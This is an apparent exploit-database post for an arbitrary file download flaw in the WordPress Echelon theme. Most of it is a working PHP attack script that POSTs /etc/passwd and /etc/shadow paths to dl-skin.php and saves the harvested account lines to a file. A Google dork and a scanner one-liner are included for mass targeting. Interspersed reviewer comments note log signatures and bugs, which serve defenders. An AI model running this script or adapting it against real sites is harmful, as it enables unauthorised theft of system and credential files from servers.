`*Name:*
Wordpress A.F.D Theme Echelon / INURL - BRASIL
*Description:*
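This exploit allows an attacker to download any file from the server that the web server process is able to read (the original text says "writable"; what a download needs is read access).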
*Usage info:*
Put the path of the file in the exploit's file field, then click the
"Download" button; the file is returned directly.
The script below requests /etc/passwd and /etc/shadow.
The flaw lies in the handling of a $_POST file parameter in:
/wp-content/themes/echelon/lib/scripts/dl-skin.php
The following fields are exploited for Arbitrary File Download
*POST:*
_mysite_download_skin={$config['file']}&submit=Download
ex:
_mysite_download_skin=/etc/passwd&submit=Download
*Exploit:*
<?php
#===============================================================================
# NAME: Wordpress A.F.D Theme Echelon
# TIPE: Arbitrary File Download
# Google DORK: inurl:/wp-content/themes/echelon
# Vendor: www.wordpress.org
# Tested on: Linux
# EXECUTE: php exploit.php www.alvo.com.br
# OUTPUT: EXPLOIT_WPAFD_Echelon.txt
# AUTOR: Cleiton Pinheiro
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# GIT: https://github.com/googleinurl
# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#
#
------------------------------------------------------------------------------
# Comand Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s
save.txt --comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#===============================================================================
# Runtime setup for a command-line run. Several string literals in this listing are
# hard-wrapped across lines; as shown, those line breaks are part of the literals.
# error_reporting(1) limits reporting to level 1 (E_ERROR); both time limits are lifted.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
# Flush output as it is produced instead of buffering it.
ob_implicit_flush(true);
ob_end_flush();
# Stop with a usage message when no host argument was given on the command line.
print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: php
exploit.php www.alvo.com.br') : NULL;
# Prefix the argument with a scheme when it does not already contain "http".
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://
{$argv[1]}";
# Stop when nothing URL-like is found in the argument. The character class in the
# pattern excludes '/' and ':' after the scheme, so only the scheme and host-like
# part is captured into $alvo_.
!(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i",
$argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php
www.alvo.com.br') : NULL;
# Separator line used in the report text.
$config['line'] =
"\n------------------------------------------------------------------------------------------------------------------\n";
# First full match of the pattern above becomes the base URL of every request.
$config['alvo'] = $alvo_[0][0];
# Path of the theme script that every request in this file is sent to.
# Defender note: this is the request path to search for in web server access logs,
# and the script to restrict or remove on sites that ship this theme.
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";
/**
 * Flush pending output so progress messages show up immediately.
 */
function __plus() {
    # PHP-level output buffer first, then the underlying write buffer.
    ob_flush();
    flush();
}
/**
 * Split a "name=value&name=value" string into an array of URL-encoded values.
 *
 * Each pair is split on every '='; only the first piece (the name) and the
 * second piece (the value) are used, so anything after a second '=' in a
 * pair is discarded. Names are used as array keys without encoding.
 *
 * @param string $query Pairs joined with '&'.
 * @return array Map of name => urlencode(value).
 */
function __convertUrlQuery($query) {
    $encoded = array();
    foreach (explode('&', $query) as $pair) {
        $pieces = explode('=', $pair);
        $name = $pieces[0];
        $encoded[$name] = urlencode($pieces[1]);
    }
    return $encoded;
}
/**
 * Send one POST request to the theme's dl-skin.php script and collect the response.
 *
 * What the request looks like on the wire (useful for log searches and WAF rules):
 *  - method POST, URL = $config['alvo'] . $config['exploit'];
 *  - body fields "_mysite_download_skin" (a URL-encoded file path) and "submit=Download";
 *  - a User-Agent with randomised numbers that always contains the literal
 *    substrings "blog.inurl.com.br/" and "Chrome/26.0.1410.63";
 *  - a Referer header equal to the request URL itself.
 *
 * NOTE(review): dl-skin.php is not shown on this page; presumably it reads the
 * posted path without restricting it to the theme's own skin files. Confirm
 * against the theme source before writing a fix.
 *
 * @param resource $curl   cURL handle created by the caller; closed before returning.
 * @param array    $config Uses the keys 'file', 'alvo' and 'exploit'.
 * @return array|false Keys 'corpo' (raw response, headers included), 'server'
 *                     (curl_getinfo() data) and 'info' (one-line summary).
 */
function __request_info($curl, $config) {
# Build the POST body as name => encoded value pairs, then join them back with '&'.
$postDados =
__convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
# $postDados_format is first used with ".=" here, without a prior assignment in this function.
foreach ($postDados as $campo => $valor) {
$postDados_format .= $campo . '=' . ($valor) . '&';
}
$postDados_format = rtrim($postDados_format, '&');
# CURLOPT_POST receives the number of fields (2 here), which acts as a truthy flag.
curl_setopt($curl, CURLOPT_POST, count($postDados));
curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
# User-Agent: version numbers are random per request, the fixed substrings are not.
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0
(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'
. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'
. rand(1, 500) . '.31');
# Referer is set to the same URL the request is sent to.
curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
$config['exploit']);
# Certificate host-name checking is switched off; CURLOPT_SSL_VERIFYPEER is not set here.
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
# Response headers are included in the returned string, ahead of the body.
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$corpo = curl_exec($curl);
$server = curl_getinfo($curl);
$status = NULL;
# Pull the status line, the Server header and the Content-Disposition header out of
# the raw response. The outer parentheses are the regex delimiters.
preg_match_all('(HTTP.*)', $corpo, $status['http']);
preg_match_all('(Server:.*)', $corpo, $status['server']);
preg_match_all('(Content-Disposition:.*)', $corpo,
$status['Content-Disposition']);
# Join the three header lines into one summary string with CR and LF removed.
$info = str_replace("\r", '', str_replace("\n", '',
"{$status['http'][0][0]}, {$status['server'][0][0]}
{$status['Content-Disposition'][0][0]}"));
curl_close($curl);
unset($curl);
# $corpo is always assigned above (curl_exec() returns false, not null, on failure),
# so isset() holds and the FALSE branch is not taken in practice.
return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,
'info' => $info) : FALSE;
}
/**
 * Decide from one response whether the requested file came back, print the
 * result and append any matched lines to EXPLOIT_WPAFD_Echelon.txt.
 *
 * The "vulnerable" decision is a case-insensitive search for "root" anywhere
 * in $rest['corpo'], which includes the response headers; any page that
 * merely contains that word is reported as a hit, so results need manual
 * confirmation.
 *
 * The report file receives the matched account lines in plain text and is
 * opened in append mode; treat it as sensitive data.
 *
 * NOTE(review): date("h:m:s") prints hour:month:second, because "m" is the
 * month in PHP's date format; minutes would be "i".
 *
 * @param array $config Uses the keys 'file', 'line' and 'alvo'.
 * @param array $rest   Result of __request_info(); only 'corpo' is read.
 * @return void
 */
function main($config,$rest) {
__plus();
print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:
{$config['file']}:\n";
# Collect text from each of these account names to the end of its line.
# The patterns are not anchored to the start of a line.
preg_match_all("(root:.*)", $rest['corpo'], $final);
preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
$_final = array_merge($final[0], $final__[0], $final___[0],
$final____[0], $final_____[0]);
$res = NULL;
# Hit / no-hit decision: "root" anywhere in the raw response, headers included.
if (preg_match("#root#i", $rest['corpo'])) {
$res.= "0x " . date("h:m:s") . " [INFO][IS
VULN][RESUME][VALUES]:\n";
$res.=$config['line'] . "\n";
foreach ($_final as $value) {
$res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
}
$res.=$config['line'];
__plus();
# Append the target and the matched lines to the report file in the working directory.
file_put_contents('EXPLOIT_WPAFD_Echelon.txt',
"{$config['alvo']}\n{$res}\n", FILE_APPEND);
print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
} else {
print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
}
}
# Script body: two requests to the same path, one per file, each followed by a report.
# Defender note: in access logs this shows up as two POSTs to dl-skin.php from one
# client in quick succession. /etc/shadow is normally readable by root only, so a
# successful second response would also mean the web server process runs with
# more privilege than it should.
print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL -
BRASIL\n";
# First request: /etc/passwd.
$config['file'] = '/etc/passwd';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
# NOTE(review): $line is not assigned anywhere in the visible listing; the
# separator text is stored in $config['line'].
print $line;
print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config,$rest);
__plus();
# Second request: /etc/shadow, with a fresh cURL handle.
$config['file'] = '/etc/shadow';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
main($config,$rest);
__plus();
`